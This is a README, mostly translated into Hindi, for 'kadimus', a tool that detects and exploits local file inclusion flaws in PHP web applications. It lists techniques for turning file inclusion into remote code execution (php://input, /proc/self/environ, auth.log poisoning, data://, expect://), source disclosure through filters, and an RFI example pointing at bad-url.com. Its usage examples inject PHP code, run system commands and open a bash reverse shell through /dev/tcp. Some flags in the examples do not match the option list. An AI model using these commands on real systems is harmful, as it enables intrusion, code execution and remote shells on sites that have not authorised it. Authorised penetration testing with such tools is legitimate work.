
kadimus is a tool to check and exploit lfi vulnerability.
kadimus एक उपकरण है जो LFI कमजोरियों की जाँच और शोषण के लिए है, जिसमें PHP सिस्टम पर ध्यान केंद्रित किया गया है।
विशेषताएँ:
पहले सुनिश्चित करें कि आपके सिस्टम पर सभी निर्भरताएँ स्थापित हैं: libcurl, libopenssl, libpcre और libssh.
फिर आप रिपॉजिटरी को क्लोन कर सकते हैं, स्रोत कोड प्राप्त करने के लिए:
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus
$ make
Options:
-h, --help यह सहायता मेनू प्रदर्शित करें
Request:
-B, --cookie STRING कस्टम HTTP कुकी हेडर सेट करें
-A, --user-agent STRING सर्वर को भेजने के लिए User-Agent
--connect-timeout SECONDS कनेक्शन के लिए अधिकतम अनुमत समय
--retry NUMBER यदि कनेक्शन विफल हो तो पुनः प्रयासों की संख्या
--proxy STRING कनेक्ट करने के लिए प्रॉक्सी (सिंटैक्स: protocol://hostname:port)
Scanner:
-u, --url STRING स्कैन/शोषण करने के लिए URL
-o, --output FILE आउटपुट परिणाम सहेजने के लिए फ़ाइल
Explotation:
--parameter STRING इंजेक्ट शोषण के लिए पैरामीटर नाम
(केवल RCE डेटा और स्रोत प्रकटीकरण के लिए आवश्यक)
RCE:
-T, --technique=TECH उपयोग करने के लिए LFI से RCE तकनीक
-C, --code STRING निष्पादित करने के लिए कस्टम PHP कोड, php ब्रैकेट के साथ
-c, --cmd STRING कमजोर लक्ष्य सिस्टम पर सिस्टम कमांड निष्पादित करें
-s, --shell HTTP अनुरोध के माध्यम से सरल कमांड शेल इंटरफ़ेस
--connect STRING कनेक्ट करने के लिए IP/होस्टनाम
-p, --port NUMBER कनेक्ट या सुनने के लिए पोर्ट नंबर
-l, --listen इनकमिंग कनेक्शन के लिए बाइंड और सुनें
--ssh-port NUMBER कमांड इंजेक्शन का प्रयास करने के लिए SSH पोर्ट सेट करें (डिफ़ॉल्ट: 22)
--ssh-target STRING SSH होस्ट सेट करें
RCE उपलब्ध तकनीकें
environ /proc/self/environ का उपयोग करके PHP कोड चलाने का प्रयास
input php://input का उपयोग करके PHP कोड चलाने का प्रयास
auth /var/log/auth.log का उपयोग करके PHP कोड चलाने का प्रयास
data data://text का उपयोग करके PHP कोड चलाने का प्रयास
expect expect://cmd का उपयोग करके कमांड चलाने का प्रयास
Source Disclosure:
-S, --source filter:// का उपयोग करके स्रोत फ़ाइल प्राप्त करने का प्रयास
-f, --filename STRING स्रोत प्राप्त करने के लिए फ़ाइल नाम सेट करें [आवश्यक]
-O FILE आउटपुट फ़ाइल सेट करें (डिफ़ॉल्ट: stdout)
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
आप RFI त्रुटियों की भी जाँच कर सकते हैं — बस रिमोट URL को resource/common_files.txt में डालें और उनकी पहचान करने के लिए रीजेक्स, उदाहरण:
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
फ़ाइल में:
http://bad-url.com/shell.txt?:scorpion say get over here
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
आप कोड के माध्यम से, या दान करके मदद कर सकते हैं। यदि आप कोड के साथ मदद करना चाहते हैं, तो कर्नेल कोड शैली को संदर्भ के रूप में उपयोग करें।
BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq